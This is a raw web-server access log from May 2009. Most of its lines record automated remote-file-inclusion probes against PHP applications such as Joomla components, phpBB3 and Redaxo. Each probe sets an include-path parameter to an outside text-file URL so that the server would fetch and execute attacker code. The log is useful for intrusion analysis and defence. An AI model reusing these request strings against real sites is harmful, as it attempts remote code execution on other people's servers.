218.249.36.194 - - [07/May/2009:22:27:16 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
210.118.194.225 - - [07/May/2009:22:27:17 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.813"
210.118.194.225 - - [07/May/2009:22:27:23 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.813"
212.59.11.66 - - [07/May/2009:22:27:55 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:27:55 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.72.114 - - [07/May/2009:22:28:02 -0400] "GET /logs/access_log.Q107071700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.94 - - [07/May/2009:22:28:44 -0400] "GET /logs/error_log.Q107100300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.54.137.9 - - [07/May/2009:22:29:04 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:29:04 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:22:29:08 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:29:16 -0400] "GET /logs/error_log.Q107072500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.199.222.19 - - [07/May/2009:22:29:42 -0400] "GET /logs/access_log.Q108100100//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:29:48 -0400] "GET /logs/access_log.Q108090900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:30:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [07/May/2009:22:30:03 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:30:03 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:30:03 -0400] "GET /logs/access_log.Q108081700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:30:06 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:30:06 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:30:06 -0400] "GET /logs/access_log.Q108081700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:30:14 -0400] "GET /logs/access_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:30:15 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:30:25 -0400] "GET /logs/error_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.54.137.9 - - [07/May/2009:22:30:28 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
115.145.170.177 - - [07/May/2009:22:30:31 -0400] "GET /logs/access_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [07/May/2009:22:30:33 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
116.121.201.70 - - [07/May/2009:22:30:34 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
115.145.170.177 - - [07/May/2009:22:30:34 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 351 "-" "libwww-perl/5.805"
116.121.201.70 - - [07/May/2009:22:30:35 -0400] "GET /logs/access_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:30:36 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:30:36 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 351 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:30:59 -0400] "GET /logs/error_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
62.116.168.108 - - [07/May/2009:22:31:01 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:31:01 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:31:01 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.145.170.177 - - [07/May/2009:22:31:04 -0400] "GET /logs/error_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
200.32.100.130 - - [07/May/2009:22:31:05 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.236.44.32 - - [07/May/2009:22:31:16 -0400] "GET /logs/access_log.Q108122500/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
222.236.44.32 - - [07/May/2009:22:31:16 -0400] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
222.236.44.32 - - [07/May/2009:22:31:16 -0400] "GET /newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
222.236.44.32 - - [07/May/2009:22:31:35 -0400] "GET /logs/access_log.Q108092700/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
218.249.36.194 - - [07/May/2009:22:31:38 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:31:38 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:31:39 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:31:39 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:22:31:57 -0400] "GET /logs/access_log.Q109032900%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:32:00 -0400] "GET /logs/access_log.Q109022000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:32:01 -0400] "GET /logs/access_log.Q109022000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:32:33 -0400] "GET /logs/access_log.Q108083000//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:32:33 -0400] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:32:33 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
68.109.233.157 - - [07/May/2009:22:32:35 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
68.109.233.157 - - [07/May/2009:22:32:35 -0400] "GET //appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
66.197.202.64 - - [07/May/2009:22:32:36 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.109.233.157 - - [07/May/2009:22:32:36 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
222.239.76.25 - - [07/May/2009:22:32:52 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:22:32:52 -0400] "GET /logs/error_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:22:32:52 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:32:53 -0400] "GET /logs/error_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:32:53 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:32:53 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:32:58 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:22:32:58 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:33:13 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:33:13 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:33:13 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:33:40 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:33:40 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:33:45 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:33:45 -0400] "GET /logs/access_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:33:46 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
122.116.178.20 - - [07/May/2009:22:33:46 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:33:46 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 200 351 "-" "libwww-perl/5.65"
212.59.11.66 - - [07/May/2009:22:33:59 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:33:59 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:33:59 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:34:11 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:34:11 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:34:11 -0400] "GET /logs/access_log.Q108081700//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:34:16 -0400] "GET /logs/access_log.Q109022000%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.32.100.130 - - [07/May/2009:22:34:18 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:34:19 -0400] "GET /logs/error_log.Q108120800//?_zb_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
85.214.20.7 - - [07/May/2009:22:34:21 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:34:22 -0400] "GET /logs/access_log.Q108082800//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:34:22 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:34:36 -0400] "GET /logs/access_log.Q109022000%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.2 - - [07/May/2009:22:34:44 -0400] "GET /logs/access_log.Q108091300//?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:35:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.116.168.108 - - [07/May/2009:22:35:22 -0400] "GET /logs/access_log.Q108081700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:35:22 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:35:23 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:35:34 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:35:34 -0400] "GET /logs/access_log.Q108082800//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:35:34 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.214.20.7 - - [07/May/2009:22:35:42 -0400] "GET /logs/access_log.Q108082900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:35:54 -0400] "GET /logs/access_log.Q109042500//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.52.107.130 - - [07/May/2009:22:36:13 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.814"
74.52.107.130 - - [07/May/2009:22:36:13 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.814"
74.52.107.130 - - [07/May/2009:22:36:13 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.814"
210.118.194.225 - - [07/May/2009:22:36:42 -0400] "GET /logs/error_log.Q108111300//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
58.227.193.198 - - [07/May/2009:22:36:47 -0400] "GET /logs/error_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
58.227.193.198 - - [07/May/2009:22:36:47 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:03 -0400] "GET //include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:03 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:03 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:04 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:04 -0400] "GET //include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:04 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:12 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:37:13 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:37:21 -0400] "GET /logs/error_log.Q108092600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.239.76.25 - - [07/May/2009:22:37:26 -0400] "GET /logs/error_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.76.25 - - [07/May/2009:22:37:32 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.52.107.130 - - [07/May/2009:22:37:51 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.814"
84.54.137.9 - - [07/May/2009:22:38:12 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:38:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:38:26 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:38:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
87.106.15.200 - - [07/May/2009:22:38:36 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.52.107.130 - - [07/May/2009:22:38:36 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eforel.com/ecommerce/images/simplelists/roxx_jpg.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.814"
66.197.202.64 - - [07/May/2009:22:39:12 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:39:15 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:39:18 -0400] "GET /logs/access_log.Q108091600%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:39:21 -0400] "GET /logs/access_log.Q108091600%20%20//include/admin.lib.inc.php?site_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:39:22 -0400] "GET /logs/access_log.Q108100600//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
